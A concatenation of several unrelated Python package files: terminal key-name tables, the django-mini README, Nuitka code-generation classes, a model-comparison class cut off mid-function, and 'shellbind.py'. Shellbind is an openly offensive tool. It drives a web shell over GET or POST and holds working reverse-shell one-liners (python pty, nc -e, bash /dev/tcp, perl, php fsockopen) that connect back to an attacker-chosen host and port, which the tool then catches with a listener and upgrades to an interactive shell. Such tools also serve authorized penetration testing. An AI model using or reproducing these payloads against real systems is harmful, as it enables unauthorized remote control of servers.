KEY_KP4 : '<kp4>',
KEY_KP5 : '<kp5>',
KEY_KP6 : '<kp6>',
KEY_KP7 : '<kp7>',
KEY_KP8 : '<kp8>',
KEY_KP9 : '<kp9>',
KEY_KPENTER : '<kp enter>',
KEY_KPPLUS : '<kp plus>',
KEY_KPMINUS : '<kp minus>',
KEY_KPMULT : '<kp mult>',
KEY_KPDIV : '<kp div>',
KEY_KPCOMMA : '<kp comma>',
KEY_KPPERIOD : '<kp period>',
KEY_KPEQUALS : '<kp equals>',
}
KEY_NAMES_REVERSE = {v:k for k, v in KEY_NAMES.items()}
# terminfo
STRNAMES = [
'ka1',
'ka3',
'kb2',
'kbs',
'kbeg',
'kcbt',
'kc1',
'kc3',
'kcan',
'ktbc',
'kclr',
'kclo',
'kcmd',
'kcpy',
'kcrt',
'kctab',
'kdch1',
'kdl1',
'kcud1',
'krmir',
'kend',
'kent',
'kel',
'ked',
'kext',
'kf0',
'kf1',
'kf10',
'kf11',
'kf12',
'kf13',
'kf14',
'kf15',
'kf16',
'kf17',
'kf18',
'kf19',
'kf2',
'kf20',
'kf21',
'kf22',
'kf23',
'kf24',
'kf25',
'kf26',
'kf27',
'kf28',
'kf29',
'kf3',
'kf30',
'kf31',
'kf32',
'kf33',
'kf34',
'kf35',
'kf36',
'kf37',
'kf38',
'kf39',
'kf4',
'kf40',
'kf41',
'kf42',
'kf43',
'kf44',
'kf45',
'kf46',
'kf47',
'kf48',
'kf49',
'kf5',
'kf50',
'kf51',
'kf52',
'kf53',
'kf54',
'kf55',
'kf56',
'kf57',
'kf58',
'kf59',
'kf6',
'kf60',
'kf61',
'kf62',
'kf63',
'kf7',
'kf8',
'kf9',
'kfnd',
'khlp',
'khome',
'kich1',
'kil1',
'kcub1',
'kll',
'kmrk',
'kmsg',
'kmov',
'knxt',
'knp',
'kopn',
'kopt',
'kpp',
'kprv',
'kprt',
'krdo',
'kref',
'krfr',
'krpl',
'krst',
'kres',
'kcuf1',
'ksav',
'kBEG',
'kCAN',
'kCMD',
'kCPY',
'kCRT',
'kDC',
'kDL',
'kslt',
'kEND',
'kEOL',
'kEXT',
'kind',
'kFND',
'kHLP',
'kHOM',
'kIC',
'kLFT',
'kMSG',
'kMOV',
'kNXT',
'kOPT',
'kPRV',
'kPRT',
'kri',
'kRDO',
'kRPL',
'kRIT',
'kRES',
'kSAV',
'kSPD',
'khts',
'kUND',
'kspd',
'kund',
'kcuu1',
]
STRFNAMES = [
'a1',
'a3',
'b2',
'backspace',
'beg',
'btab',
'c1',
'c3',
'cancel',
'catab',
'clear',
'close',
'command',
'copy',
'create',
'ctab',
'dc',
'dl',
'down',
'eic',
'end',
'enter',
'eol',
'eos',
'exit',
'f0',
'f1',
'f10',
'f11',
'f12',
'f13',
'f14',
'f15',
'f16',
'f17',
'f18',
'f19',
'f2',
'f20',
'f21',
'f22',
'f23',
'f24',
'f25',
'f26',
'f27',
'f28',
'f29',
'f3',
'f30',
'f31',
'f32',
'f33',
'f34',
'f35',
'f36',
'f37',
'f38',
'f39',
'f4',
'f40',
'f41',
'f42',
'f43',
'f44',
'f45',
'f46',
'f47',
'f48',
'f49',
'f5',
'f50',
'f51',
'f52',
'f53',
'f54',
'f55',
'f56',
'f57',
'f58',
'f59',
'f6',
'f60',
'f61',
'f62',
'f63',
'f7',
'f8',
'f9',
'find',
'help',
'home',
'ic',
'il',
'left',
'll',
'mark',
'message',
'move',
'next',
'npage',
'open',
'options',
'ppage',
'previous',
'print',
'redo',
'reference',
'refresh',
'replace',
'restart',
'resume',
'right',
'save',
'sbeg',
'scancel',
'scommand',
'scopy',
'screate',
'sdc',
'sdl',
'select',
'send',
'seol',
'sexit',
'sf',
'sfind',
'shelp',
'shome',
'sic',
'sleft',
'smessage',
'smove',
'snext',
'soptions',
'sprevious',
'sprint',
'sr',
'sredo',
'sreplace',
'sright',
'srsume',
'ssave',
'ssuspend',
'stab',
'sundo',
'suspend',
'undo',
'up',
]
FUNCSYMS = {
'backspace' : (KEY_DEL, MOD_NONE ),
'begin' : (KEY_BEGIN, MOD_NONE ),
'beg' : (KEY_BEGIN, MOD_NONE ),
'btab' : (KEY_TAB, MOD_SHIFT),
'cancel' : (KEY_CANCEL, MOD_NONE ),
'clear' : (KEY_CLEAR, MOD_NONE ),
'close' : (KEY_CLOSE, MOD_NONE ),
'command' : (KEY_COMMAND, MOD_NONE ),
'copy' : (KEY_COPY, MOD_NONE ),
'dc' : (KEY_DELETE, MOD_NONE ),
'down' : (KEY_DOWN, MOD_NONE ),
'end' : (KEY_END, MOD_NONE ),
'enter' : (KEY_ENTER, MOD_NONE ),
'exit' : (KEY_EXIT, MOD_NONE ),
'find' : (KEY_FIND, MOD_NONE ),
'help' : (KEY_HELP, MOD_NONE ),
'home' : (KEY_HOME, MOD_NONE ),
'ic' : (KEY_INSERT, MOD_NONE ),
'left' : (KEY_LEFT, MOD_NONE ),
'mark' : (KEY_MARK, MOD_NONE ),
'message' : (KEY_MESSAGE, MOD_NONE ),
'move' : (KEY_MOVE, MOD_NONE ),
'next' : (KEY_PAGEDOWN, MOD_NONE ), # Not quite, but it's the best we can do
'npage' : (KEY_PAGEDOWN, MOD_NONE ),
'open' : (KEY_OPEN, MOD_NONE ),
'options' : (KEY_OPTIONS, MOD_NONE ),
'ppage' : (KEY_PAGEUP, MOD_NONE ),
'previous' : (KEY_PAGEUP, MOD_NONE ), # Not quite, but it's the best we can do
'print' : (KEY_PRINT, MOD_NONE ),
'redo' : (KEY_REDO, MOD_NONE ),
'reference' : (KEY_REFERENCE, MOD_NONE ),
'refresh' : (KEY_REFRESH, MOD_NONE ),
'replace' : (KEY_REPLACE, MOD_NONE ),
'restart' : (KEY_RESTART, MOD_NONE ),
'resume' : (KEY_RESUME, MOD_NONE ),
'right' : (KEY_RIGHT, MOD_NONE ),
'save' : (KEY_SAVE, MOD_NONE ),
'select' : (KEY_SELECT, MOD_NONE ),
'suspend' : (KEY_SUSPEND, MOD_NONE ),
'undo' : (KEY_UNDO, MOD_NONE ),
'up' : (KEY_UP, MOD_NONE ),
}
|
PypiClean
|
/django-mini-0.5.1.tar.gz/django-mini-0.5.1/README.rst
|
django-mini
===========
Django-mini is an MIT-licensed command-line utility for running `Django`_ management commands without a settings module. It is intended to help developers run and test stand-alone Django apps.
.. _Django: https://www.djangoproject.com/
Installation
------------
Install using pip from PyPI::
pip install django-mini
Alternatively, `download the source`_, unpack it and install it like a typical Python distribution::
python setup.py install
The installation consists of a single pure-Python module called ``djangomini`` and an executable script ``django-mini.py``. Django-mini assumes a recent version of Django is already installed.
Basic Usage
-----------
Django-mini has a few flags for configuring Django settings, and then any other arguments are passed to Django's management utility so it can do its stuff.
- ``--database <database>`` - to specify the default database.
- ``--app <appname>`` - adds your app package to Django's ``INSTALLED_APPS``.
- ``--admin`` - adds Django's built-in admin and its requirements.
- ``--debug-toolbar`` - adds Rob Hudson's `django-debug-toolbar`_ and its requirements.
- ``-p`` or ``--persisting`` - use an sqlite database named ``djangomini.sqlite``.
.. _django-debug-toolbar: https://github.com/django-debug-toolbar/django-debug-toolbar
If you don't use the persisting option or specify a database, django-mini will use an in-memory sqlite database (implying it will get destroyed after the command finishes).
To run Django with your app and the built-in admin, use a named database::
django-mini.py --database /tmp/django.sqlite --admin --app myapp syncdb
django-mini.py --database /tmp/django.sqlite --admin --app myapp runserver
Or use the persisting option::
django-mini.py -p --admin syncdb
django-mini.py -p --admin runserver
That will start Django's development server with the admin. The admin application will be available at ``http://localhost:8000/admin/`` and all other requests will be directed to your app, i.e. your app's ``myapp.urls`` is configured to serve all other requests.
`The full documentation`_ has more examples of use, including how to use other databases, how to change any setting, and how to mount an app at a particular URL.
.. _The full documentation: https://github.com/davidwtbuxton/django-mini/blob/master/docs/index.rst
.. _Download the source: https://github.com/davidwtbuxton/django-mini
|
PypiClean
|
/Nuitka-1.8.tar.gz/Nuitka-1.8/nuitka/code_generation/c_types/CTypePyObjectPointers.py
|
from nuitka.__past__ import iterItems, xrange
from nuitka.code_generation.ErrorCodes import (
getErrorExitBoolCode,
getReleaseCode,
)
from nuitka.code_generation.templates.CodeTemplatesVariables import (
template_del_local_intolerant,
template_del_local_known,
template_del_local_tolerant,
template_del_shared_intolerant,
template_del_shared_known,
template_del_shared_tolerant,
template_release_object_clear,
template_release_object_unclear,
template_write_local_clear_ref0,
template_write_local_clear_ref1,
template_write_local_empty_ref0,
template_write_local_empty_ref1,
template_write_local_inplace,
template_write_local_unclear_ref0,
template_write_local_unclear_ref1,
template_write_shared_clear_ref0,
template_write_shared_clear_ref1,
template_write_shared_inplace,
template_write_shared_unclear_ref0,
template_write_shared_unclear_ref1,
)
from nuitka.Constants import getConstantValueGuide, isMutable
from .CTypeBases import CTypeBase
# Need to run "bin/generate-specialized-c-code" when changing these values.
make_list_constant_direct_threshold = 4
make_list_constant_hinted_threshold = 13
class CPythonPyObjectPtrBase(CTypeBase):
@classmethod
def emitVariableAssignCode(
cls, value_name, needs_release, tmp_name, ref_count, inplace, emit, context
):
if inplace:
# Releasing is not an issue here, local variable reference never
# gave a reference, and the in-place code deals with possible
# replacement/release.
template = template_write_local_inplace
else:
if ref_count:
if needs_release is False:
template = template_write_local_empty_ref0
elif needs_release is True:
template = template_write_local_clear_ref0
else:
template = template_write_local_unclear_ref0
else:
if needs_release is False:
template = template_write_local_empty_ref1
elif needs_release is True:
template = template_write_local_clear_ref1
else:
template = template_write_local_unclear_ref1
emit(template % {"identifier": value_name, "tmp_name": tmp_name})
@classmethod
def emitAssignmentCodeToNuitkaIntOrLong(
cls, to_name, value_name, needs_check, emit, context
):
to_type = to_name.getCType()
to_type.emitVariantAssignmentCode(
int_name=to_name,
value_name=value_name,
int_value=None,
emit=emit,
context=context,
)
@classmethod
def getTruthCheckCode(cls, value_name):
return "CHECK_IF_TRUE(%s) == 1" % value_name
@classmethod
def emitTruthCheckCode(cls, to_name, value_name, emit):
assert to_name.c_type == "int", to_name
emit("%s = CHECK_IF_TRUE(%s);" % (to_name, value_name))
@classmethod
def getReleaseCode(cls, value_name, needs_check, emit):
if needs_check:
template = template_release_object_unclear
else:
template = template_release_object_clear
emit(template % {"identifier": value_name})
@classmethod
def emitAssignInplaceNegatedValueCode(cls, to_name, needs_check, emit, context):
# Half way, virtual method: pylint: disable=unused-argument
update_code = "%(to_name)s = (%(truth_check)s) ? Py_False : Py_True" % {
"truth_check": cls.getTruthCheckCode(to_name),
"to_name": to_name,
}
if context.needsCleanup(to_name):
# The release here can only work for this class, needs more work to be able
# to deal with CTypePyObjectPtrPtr and CTypeCellObject.
assert cls is CTypePyObjectPtr
emit(
"""\
{
%(tmp_decl)s = %(to_name)s;
%(update_code)s;
Py_INCREF(%(to_name)s);
Py_DECREF(old);
}
"""
% {
"tmp_decl": cls.getVariableArgDeclarationCode("old"),
"update_code": update_code,
"to_name": to_name,
}
)
else:
emit("%s;" % update_code)
@classmethod
def emitAssignmentCodeToNuitkaBool(
cls, to_name, value_name, needs_check, emit, context
):
truth_name = context.allocateTempName("truth_name", "int")
emit("%s = CHECK_IF_TRUE(%s);" % (truth_name, value_name))
getErrorExitBoolCode(
condition="%s == -1" % truth_name,
needs_check=needs_check,
emit=emit,
context=context,
)
emit(
"%s = %s == 0 ? NUITKA_BOOL_FALSE : NUITKA_BOOL_TRUE;"
% (to_name, truth_name)
)
@classmethod
def emitAssignmentCodeFromConstant(
cls, to_name, constant, may_escape, emit, context
):
# Many cases to deal with, pylint: disable=too-many-branches,too-many-statements
if type(constant) is dict:
if not may_escape:
code = context.getConstantCode(constant)
ref_count = 0
elif constant:
for key, value in iterItems(constant):
# key cannot be mutable.
assert not isMutable(key)
if isMutable(value):
needs_deep = True
break
else:
needs_deep = False
if needs_deep:
code = "DEEP_COPY_DICT(tstate, %s)" % context.getConstantCode(
constant, deep_check=False
)
ref_count = 1
else:
code = "DICT_COPY(%s)" % context.getConstantCode(
constant, deep_check=False
)
ref_count = 1
else:
code = "MAKE_DICT_EMPTY()"
ref_count = 1
elif type(constant) is set:
if not may_escape:
code = context.getConstantCode(constant)
ref_count = 0
elif constant:
code = "PySet_New(%s)" % context.getConstantCode(constant)
ref_count = 1
else:
code = "PySet_New(NULL)"
ref_count = 1
elif type(constant) is list:
if not may_escape:
code = context.getConstantCode(constant)
ref_count = 0
elif constant:
for value in constant:
if isMutable(value):
needs_deep = True
break
else:
needs_deep = False
if needs_deep:
code = 'DEEP_COPY_LIST_GUIDED(tstate, %s, "%s")' % (
context.getConstantCode(constant, deep_check=False),
getConstantValueGuide(constant, elements_only=True),
)
ref_count = 1
else:
constant_size = len(constant)
if constant_size > 1 and all(
constant[i] is constant[0] for i in xrange(1, len(constant))
):
code = "MAKE_LIST_REPEATED(%s, %s)" % (
constant_size,
context.getConstantCode(constant[0], deep_check=False),
)
elif constant_size < make_list_constant_direct_threshold:
code = "MAKE_LIST%d(%s)" % (
constant_size,
",".join(
context.getConstantCode(constant[i], deep_check=False)
for i in xrange(constant_size)
),
)
elif constant_size < make_list_constant_hinted_threshold:
code = "MAKE_LIST%d(%s)" % (
constant_size,
context.getConstantCode(constant, deep_check=False),
)
else:
code = "LIST_COPY(%s)" % context.getConstantCode(
constant, deep_check=False
)
ref_count = 1
else:
# TODO: For the zero elements list, maybe have a dedicated function, which
# avoids a bit of tests, not sure we want LTO do this.
code = "MAKE_LIST_EMPTY(0)"
ref_count = 1
elif type(constant) is tuple:
needs_deep = False
if may_escape:
for value in constant:
if isMutable(value):
needs_deep = True
break
if needs_deep:
code = 'DEEP_COPY_TUPLE_GUIDED(tstate, %s, "%s")' % (
context.getConstantCode(constant, deep_check=False),
getConstantValueGuide(constant, elements_only=True),
)
ref_count = 1
else:
code = context.getConstantCode(constant)
ref_count = 0
elif type(constant) is bytearray:
if may_escape:
code = "BYTEARRAY_COPY(tstate, %s)" % context.getConstantCode(constant)
ref_count = 1
else:
code = context.getConstantCode(constant)
ref_count = 0
else:
code = context.getConstantCode(constant=constant)
ref_count = 0
if to_name.c_type == "PyObject *":
value_name = to_name
else:
value_name = context.allocateTempName("constant_value")
emit("%s = %s;" % (value_name, code))
if to_name is not value_name:
cls.emitAssignConversionCode(
to_name=to_name,
value_name=value_name,
needs_check=False,
emit=emit,
context=context,
)
# Above is supposed to transfer ownership.
if ref_count:
getReleaseCode(value_name, emit, context)
else:
if ref_count:
context.addCleanupTempName(value_name)
class CTypePyObjectPtr(CPythonPyObjectPtrBase):
c_type = "PyObject *"
helper_code = "OBJECT"
@classmethod
def getInitValue(cls, init_from):
if init_from is None:
return "NULL"
else:
return init_from
@classmethod
def getInitTestConditionCode(cls, value_name, inverted):
return "%s %s NULL" % (value_name, "==" if inverted else "!=")
@classmethod
def emitReinitCode(cls, value_name, emit):
emit("%s = NULL;" % value_name)
@classmethod
def getVariableArgDeclarationCode(cls, variable_code_name):
return "PyObject *%s" % variable_code_name
@classmethod
def getVariableArgReferencePassingCode(cls, variable_code_name):
return "&%s" % variable_code_name
@classmethod
def getCellObjectAssignmentCode(cls, target_cell_code, variable_code_name, emit):
emit("%s = Nuitka_Cell_New0(%s);" % (target_cell_code, variable_code_name))
@classmethod
def getDeleteObjectCode(
cls, to_name, value_name, needs_check, tolerant, emit, context
):
if not needs_check:
emit(template_del_local_known % {"identifier": value_name})
elif tolerant:
emit(template_del_local_tolerant % {"identifier": value_name})
else:
emit(
template_del_local_intolerant
% {"identifier": value_name, "result": to_name}
)
@classmethod
def emitAssignmentCodeFromBoolCondition(cls, to_name, condition, emit):
emit(
"%(to_name)s = (%(condition)s) ? Py_True : Py_False;"
% {"to_name": to_name, "condition": condition}
)
@classmethod
def emitValueAccessCode(cls, value_name, emit, context):
# Nothing to do for this type, pylint: disable=unused-argument
return value_name
@classmethod
def emitValueAssertionCode(cls, value_name, emit):
emit("CHECK_OBJECT(%s);" % value_name)
@classmethod
def emitAssignConversionCode(cls, to_name, value_name, needs_check, emit, context):
if value_name.c_type == cls.c_type:
emit("%s = %s;" % (to_name, value_name))
context.transferCleanupTempName(value_name, to_name)
elif value_name.c_type in ("nuitka_bool", "bool"):
cls.emitAssignmentCodeFromBoolCondition(
condition=value_name.getCType().getTruthCheckCode(value_name),
to_name=to_name,
emit=emit,
)
elif value_name.c_type == "nuitka_ilong":
emit("ENFORCE_ILONG_OBJECT_VALUE(&%s);" % value_name)
emit("%s = %s.ilong_object;" % (to_name, value_name))
context.transferCleanupTempName(value_name, to_name)
else:
assert False, to_name.c_type
@classmethod
def getExceptionCheckCondition(cls, value_name):
return "%s == NULL" % value_name
@classmethod
def hasErrorIndicator(cls):
return True
@classmethod
def getReleaseCode(cls, value_name, needs_check, emit):
if needs_check:
template = template_release_object_unclear
else:
template = template_release_object_clear
emit(template % {"identifier": value_name})
@classmethod
def getTakeReferenceCode(cls, value_name, emit):
"""Take reference code for given object."""
emit("Py_INCREF(%s);" % value_name)
class CTypePyObjectPtrPtr(CPythonPyObjectPtrBase):
c_type = "PyObject **"
@classmethod
def getInitTestConditionCode(cls, value_name, inverted):
return "*%s %s NULL" % (value_name, "==" if inverted else "!=")
@classmethod
def getVariableArgDeclarationCode(cls, variable_code_name):
return "PyObject **%s" % variable_code_name
@classmethod
def getVariableArgReferencePassingCode(cls, variable_code_name):
return variable_code_name
@classmethod
def emitValueAccessCode(cls, value_name, emit, context):
# No code needed for this type, pylint: disable=unused-argument
from ..VariableDeclarations import VariableDeclaration
# Use the object pointed to.
return VariableDeclaration("PyObject *", "*%s" % value_name, None, None)
@classmethod
def emitAssignmentCodeFromBoolCondition(cls, to_name, condition, emit):
emit(
"*%(to_name)s = (%(condition)s) ? Py_True : Py_False;"
% {"to_name": to_name, "condition": condition}
)
class CTypeCellObject(CTypeBase):
c_type = "struct Nuitka_CellObject *"
@classmethod
def getInitValue(cls, init_from):
# TODO: Single out "init_from" only user, so it becomes sure that we
# get a reference transferred here in these cases.
if init_from is not None:
return "Nuitka_Cell_New1(%s)" % init_from
else:
return "Nuitka_Cell_Empty()"
@classmethod
def getInitTestConditionCode(cls, value_name, inverted):
return "%s->ob_ref %s NULL" % (value_name, "==" if inverted else "!=")
@classmethod
def getCellObjectAssignmentCode(cls, target_cell_code, variable_code_name, emit):
emit("%s = %s;" % (target_cell_code, variable_code_name))
emit("Py_INCREF(%s);" % (target_cell_code))
@classmethod
def emitVariableAssignCode(
cls, value_name, needs_release, tmp_name, ref_count, inplace, emit, context
):
if inplace:
# Releasing is not an issue here, local variable reference never
# gave a reference, and the in-place code deals with possible
# replacement/release.
template = template_write_shared_inplace
else:
if ref_count:
if needs_release is False:
template = template_write_shared_clear_ref0
else:
template = template_write_shared_unclear_ref0
else:
if needs_release is False:
template = template_write_shared_clear_ref1
else:
template = template_write_shared_unclear_ref1
emit(template % {"identifier": value_name, "tmp_name": tmp_name})
@classmethod
def emitValueAccessCode(cls, value_name, emit, context):
# No code needed for this type, pylint: disable=unused-argument
from ..VariableDeclarations import VariableDeclaration
# Use the object pointed to.
return VariableDeclaration(
"PyObject *", "Nuitka_Cell_GET(%s)" % value_name, None, None
)
@classmethod
def getVariableArgDeclarationCode(cls, variable_code_name):
return "struct Nuitka_CellObject *%s" % variable_code_name
@classmethod
def getVariableArgReferencePassingCode(cls, variable_code_name):
return variable_code_name
@classmethod
def emitAssignmentCodeFromBoolCondition(cls, to_name, condition, emit):
emit(
"%(to_name)s->ob_ref = (%(condition)s) ? Py_True : Py_False;"
% {"to_name": to_name, "condition": condition}
)
@classmethod
def getDeleteObjectCode(
cls, to_name, value_name, needs_check, tolerant, emit, context
):
if not needs_check:
emit(template_del_shared_known % {"identifier": value_name})
elif tolerant:
emit(template_del_shared_tolerant % {"identifier": value_name})
else:
emit(
template_del_shared_intolerant
% {"identifier": value_name, "result": to_name}
)
@classmethod
def getReleaseCode(cls, value_name, needs_check, emit):
if needs_check:
template = template_release_object_unclear
else:
template = template_release_object_clear
emit(template % {"identifier": value_name})
@classmethod
def emitReinitCode(cls, value_name, emit):
emit("%s = NULL;" % value_name)
@classmethod
def emitValueAssertionCode(cls, value_name, emit):
emit("CHECK_OBJECT(%s->ob_ref);" % value_name)
@classmethod
def emitReleaseAssertionCode(cls, value_name, emit):
emit("CHECK_OBJECT(%s);" % value_name)
|
PypiClean
|
/shellbind-1.3.0.tar.gz/shellbind-1.3.0/shellbind.py
|
import requests
import argparse
import sys
import readline
import nclib
import tty
import time
import os
import multiprocessing
import random
import string
# Parse Command Line Arguments
parser = argparse.ArgumentParser(description="Shellbind is a programm that helps to upgrade a simple GET/POST webshell into a semi- or fully-interactive (reverse) shell.", epilog="Examples:\n-Semi interactive shell (no cd, su, etc.)\n\tshellbind.py -X POST -p cmd -u http://vuln.example/shell.php\n-Fully interactive shell with verbose output\n\tshellbind.py -p cmd -u http://vuln.example/shell.py -v -r auto:10.10.13.37:8080", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-p", "--parameter", metavar="PARAMETER NAME", dest="para_name", help="The parameter the is used to run shell commands", required=True)
parser.add_argument("-X" , "--method", metavar="METHOD", dest="method", help="The method (GET/POST) that that is used (Default: GET)", default="GET")
parser.add_argument("-u", "--host", dest="host", metavar="HOST", help="The host that is attacked.\nExample: http://www.victim.com/vuln.php", required=True)
parser.add_argument("-v", "--verbose", dest="debug", help="Verbose Output", action='store_true', default=False)
parser.add_argument("-r", "--reverse", dest="reverse", help="If set the programm upgrades the connection from a webshell to a fully-interactive reverse shell.\nAvailable methods are:\n auto - Try until a reverse shell binds\n php - php reverseshell\n py - python3 reverse shell with sockets\n py2 - python2 reverse shell with sockets\n nc1 - netcat reverse shell with -e flag\n nc2 - netcat reverse shell with -c flag\n bash - sh -i reverse shell\n perl - perl reverse shell\nLHOST should be the ip that the victim can connect to\nThe port can be any unused port", metavar="METHOD:LHOST:PORT")
parser.add_argument("--prefix", dest="prefix", help="Set a prefix that is send before every command in case of semi-interactive or once for the reverse shell if fully-interactive", default="")
parser.add_argument("--postfix", dest="postfix", help="Set a postfix that is send after every command in case of semi-interactive or once for the reverse shell if fully-interactive", default="")
parser.add_argument("-c", "--clean", dest="clean", help="Clean output from trash like html (Does not work with Windows CMD)", action='store_true', default=False)
args = parser.parse_args()
# Initilized listener and start trying reverse shell payloads
def init_upgraded_shell():
args.method = args.method.upper()
if args.method not in ["GET", "POST"]:
print(f"[!] Method {args.method} not recognized")
sys.exit()
try:
payload_method, ip, port = args.reverse.split(":")
port = int(port)
# Payloads from revshells.com
payloads = {
"py": f"""python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'""",
"py2": f"""python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'""",
"nc1": f"""nc {ip} {port} -e sh""",
"nc2": f"""nc -c sh {ip} {port}""",
"bash": f"""sh -i >& /dev/tcp/{ip}/{port} 0>&1""",
"perl": f"""perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");}};'""",
"php": f"""php -r '$sock=fsockopen("{ip}",{port});exec("sh <&3 >&3 2>&3");'"""
}
if payload_method not in payloads.keys() and payload_method != 'auto':
print("[!] Method not found")
sys.exit()
p = multiprocessing.Process(target=back_call, args=[payload_method, ip, port, payloads])
p.start()
interactive_shell(ip, port, p)
except (ValueError):
print("[!] Could not parse METHOD:IP:PORT")
# Tries to call back to listener with given payloads or tries everything if set to auto
def back_call(payload_method, ip, port, payloads):
time.sleep(1)
timeout = 1
if payload_method == 'auto':
for payload in payloads.values():
try:
if args.debug:
print(f"[!] Trying: {payload}")
if args.method == "GET":
params = {args.para_name: args.prefix + payload + args.postfix}
requests.get(args.host, params=params, timeout=timeout)
elif args.method == "POST":
params = {args.para_name: args.prefix + payload + args.postfix}
requests.post(args.host, data=params, timeout=timeout)
time.sleep(1)
except:
pass
else:
payload = payloads[payload_method]
try:
if args.debug:
print(f"[!] Trying: {payload}")
if args.method == "GET":
params = {args.para_name: payload}
requests.get(args.host, params=params, timeout=timeout)
elif args.method == "POST":
params = {args.para_name: payload}
requests.post(args.host, data=params, timeout=timeout)
time.sleep(1)
except:
pass
print(f"[!] Method {payload_method} was not successfull")
print(f"[!] Could not call back")
# Listens on given port and catches reverse shell. Then proceeds to upgrade it.
def interactive_shell(ip, port, child_process):
try:
print("[!] Starting listener")
nc = nclib.Netcat(listen=(ip, port))
except KeyboardInterrupt:
child_process.terminate()
sys.exit()
child_process.terminate()
if args.debug:
print("[!] Backcall Process Terminates. Received Shell")
tty.setraw(0)
columns, rows = os.get_terminal_size()
nc.send("\n")
nc.send(f"stty rows {rows} cols {columns}\n")
nc.send('''python3 -c "import pty;pty.spawn('/bin/bash')"\n''')
time.sleep(1)
nc.send("reset\n")
nc.interactive()
def web_shell():
args.method = args.method.upper()
if args.method not in ["GET", "POST"]:
print(f"[!] Method {args.method} not recognized")
sys.exit()
if args.debug:
print("[!] Shellbind is ready. You can run commands now")
# This is used clean junk like html
upper_seq = ""
lower_seq = ""
command_upper = ""
command_lower = ""
if args.clean:
upper_seq = "".join([random.choice(string.ascii_uppercase) for x in range(16)])
lower_seq = "".join([random.choice(string.ascii_uppercase) for x in range(16)])
command_upper = "echo " + upper_seq + ";"
command_lower = "; echo " + lower_seq + ";"
# Command loop
while True:
try:
command = input("$ ")
command = args.prefix + command_upper + command + command_lower + args.postfix
if args.method == "GET":
params = {args.para_name: command}
res = requests.get(args.host, params=params)
else:
params = {args.para_name: command}
res = requests.post(args.host, data=params)
out = res.text
if args.clean:
out = out.split(upper_seq + "\n")[1]
out = out.split(lower_seq + "\n")[0]
print(out)
except requests.ConnectionError:
host = args.host.replace("\n", "")
print(f"[!] Connection to {host} not possible")
sys.exit()
except KeyboardInterrupt:
if args.debug:
print("[!] Exiting Connection to webshell")
sys.exit()
if __name__ == '__main__':
if args.reverse is not None :
init_upgraded_shell()
else:
web_shell()
|
PypiClean
|
/monk_keras_cpu-0.0.1-py3-none-any.whl/monk/compare_prototype.py
|
from monk.system.imports import *
from monk.system.base_class import system
from monk.system.common import read_json
from monk.system.graphs.line import training_accuracy_curve
from monk.system.graphs.line import validation_accuracy_curve
from monk.system.graphs.line import training_loss_curve
from monk.system.graphs.line import validation_loss_curve
from monk.system.graphs.bar import training_time_plot
from monk.system.graphs.bar import max_accuracy_plot
from monk.system.graphs.bar import max_gpu_usage_plot
class compare(system):
'''
Class to compare multiple experiments
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
@accepts("self", verbose=int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose)
@error_checks(None, ["name", ["A-Z", "a-z", "0-9", "-", "_"]], post_trace=False)
@accepts("self", str, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def Comparison(self, comparison_name):
'''
Create comparison project to compare and analyse multiple experiments
Args:
comparison_name (str): Project Name
Returns:
None
'''
self.set_system_comparison(comparison_name);
self.custom_print("Comparison: - {}".format(comparison_name));
@accepts("self", str, str, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def Add_Experiment(self, project_name, experiment_name):
'''
Add experiment for comparison
Args:
project_name (str): Project Name
experiment_name (str): Experiment Name
Returns:
None
'''
json_file = self.system_dict["master_systems_dir_relative"] + project_name + "/" + experiment_name + "/experiment_state.json";
if(not os.path.isfile(json_file)):
msg = "Project - {}, Experiment - {} does not exist".format(project_name, experiment_name)
raise ConstraintError(msg)
self.system_dict["local"]["experiments_list"].append(json_file);
self.system_dict["local"]["project_experiment_list"].append(project_name + ":" + experiment_name);
self.custom_print("Project - {}, Experiment - {} added".format(project_name, experiment_name));
@accepts("self", post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def Generate_Statistics(self):
'''
Generate Statistics
Args:
None
Returns:
None
'''
self.custom_print("Generating statistics...");
data = [];
for i in range(len(self.system_dict["local"]["experiments_list"])):
fname = self.system_dict["local"]["experiments_list"][i];
system_dict = read_json(fname);
data.append(system_dict);
training_accuracy_curve(data, self.system_dict);
validation_accuracy_curve(data, self.system_dict);
training_loss_curve(data, self.system_dict);
validation_loss_curve(data, self.system_dict);
training_time_plot(data, self.system_dict);
max_accuracy_plot(data, self.system_dict);
max_gpu_usage_plot(data, self.system_dict);
# table
table = [];
#headers
headers = ["project", "experiment", "base_model", "origin", "best val acc", "test acc", "num test images", \
"epochs", "base lr", "optimizer", "lr scheduler", "loss func", "All layers trained", "gpu used", "max gpu usage", "training time", "train dataset type", \
"num train images", "num val images", "shuffled dataset", "train transforms", "val transforms", "test transforms"]
for i in range(len(data)):
tmp = [];
tmp.append(str(data[i]["project_name"]));
tmp.append(str(data[i]["experiment_name"]));
model_name = data[i]["model"]["params"]["model_name"];
if("/" in model_name):
model_name = model_name.split("/")[-1];
tmp.append(str(model_name));
tmp.append(str(data[i]["origin"]));
if(data[i]["training"]["status"]):
tmp.append(str(data[i]["training"]["outputs"]["best_val_acc"]));
else:
tmp.append("NA");
if(data[i]["testing"]["status"]):
tmp.append(str(data[i]["testing"]["percentage_accuracy"]));
tmp.append(str(data[i]["testing"]["num_images"]));
else:
tmp.append("NA");
tmp.append("NA");
tmp.append(str(data[i]["hyper-parameters"]["num_epochs"]));
